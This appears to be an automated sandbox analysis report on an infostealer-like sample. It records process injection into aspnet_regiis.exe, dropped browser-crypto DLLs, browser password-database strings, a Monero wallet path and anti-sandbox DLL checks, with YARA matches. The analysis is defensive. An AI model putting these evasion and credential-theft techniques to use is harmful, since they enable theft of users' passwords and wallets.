                          Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: aspnet_regiis.exe, 00000003.00000003.1737043353.0000000003266000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1724501799.000000000322A000.00000004.00000020.00020000.00000000.sdmp, JDGCGH.3.dr, HJKKFI.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: file.exeVirustotal: Detection: 27%
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntvdm64.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.ui.immersive.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: bcp47mrm.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uianimation.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: resourcepolicyclient.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: d3d10warp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dxcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2599259096.000000003A30F000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2594589461.000000002E429000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

                          Data Obfuscation

                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.380000.0.unpack 25W~Dos:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: file.exeStatic PE information: section name: 25W~Dos
                          Source: file.exeStatic PE information: section name:
                          Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                          Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                          Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D8EDD push ss; ret 0_2_003D8FBA
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7697F1 push ecx; ret 0_2_6D769804
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042F142 push ecx; ret 3_2_0042F155
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00422D3B push esi; ret 3_2_00422D3D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041DDB5 push ecx; ret 3_2_0041DDC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00432715 push 0000004Ch; iretd 3_2_00432726
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC5B536 push ecx; ret 3_2_6CC5B549
                          Source: file.exeStatic PE information: section name: 25W~Dos entropy: 7.999495427642678
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File created: C:\ProgramData\nss3.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File created: C:\ProgramData\mozglue.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File created: C:\ProgramData\msvcp140.dll
                          Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Roaming\msvcp110.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File created: C:\ProgramData\freebl3.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File created: C:\ProgramData\vcruntime140.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File created: C:\ProgramData\softokn3.dll
                          Source: C:\Users\user\Desktop\file.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: Yara match, File source: 3.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 3.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 0.2.file.exe.6d771000.7.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 0.2.file.exe.6d771000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 0.2.file.exe.6d740000.4.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara match, File source: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                          Source: Yara match, File source: Process Memory Space: aspnet_regiis.exe PID: 7620, type: MEMORYSTR
                          Source: aspnet_regiis.exe, Binary or memory string: DIR_WATCH.DLL
                          Source: aspnet_regiis.exe, Binary or memory string: SBIEDLL.DLL
                          Source: aspnet_regiis.exe, Binary or memory string: API_LOG.DLL
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Users\user\Desktop\file.exe, Memory allocated: C20000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe, Memory allocated: 2780000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe, Memory allocated: 25D0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe, Memory allocated: 4E00000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe, Memory allocated: 5E00000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe, Memory allocated: 5F30000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe, Memory allocated: 6F30000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe, Memory allocated: 7280000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\file.exe, Memory allocated: 8280000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_0040180D
                          Source: C:\Users\user\Desktop\file.exe, Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Window / User API: threadDelayed 894
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Window / User API: threadDelayed 1967
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Dropped PE file which has not been started: C:\ProgramData\nss3.dll
                          Source: C:\Users\user\Desktop\file.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, API coverage: 9.5 %
                          Source: C:\Users\user\Desktop\file.exe TID: 7560, Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh3_2_00410DDB
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D762CBD FindFirstFileExW,0_2_6D762CBD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
